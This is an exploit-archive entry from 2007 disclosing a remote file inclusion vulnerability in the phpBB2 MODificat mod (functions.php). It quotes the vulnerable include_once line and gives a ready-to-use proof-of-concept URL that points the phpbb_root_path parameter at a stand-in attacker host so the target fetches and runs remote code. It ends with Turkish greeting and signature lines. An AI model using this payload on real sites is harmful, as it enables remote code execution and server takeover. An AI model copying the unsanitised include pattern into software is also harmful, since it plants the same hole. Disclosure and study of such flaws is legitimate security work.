[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpBB2 MODificat <= 0.2.0 (functions.php) Remote Include Vulnerability
# Published : 2007-01-30
# Author : xoron
# Previous Title : MyNews <= 4.2.2 (themefunc.php) Remote File Include Vulnerability
# Next Title : GuppY <= 4.5.16 Remote Commands Execution Exploit
-----------------------------------------------
phpBB2 MODificat (phpbb_root_path) Remote File Include Exploit
-----------------------------------------------
Author: xoron
xoron.biz
-----------------------------------------------
Code:
include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );
-----------------------------------------------
POC:
www.[target].com/[script_pat]/includes/functions.php?phpbb_root_path=http://evilscripts?
-----------------------------------------------
download: http://sourceforge.net/project/showfiles.php?group_id=110366
-----------------------------------------------
Tesekkurler: pang0, chaos, can bjorn
Thanx: str0ke, kacper
xoron gider izi kalir, selametle.
kaybetmenin tiryakisi bir cocuk xoron.
Adimizi altin harflerle yazdik.
-----------------------------------------------
# www.Syue.com [2007-01-30]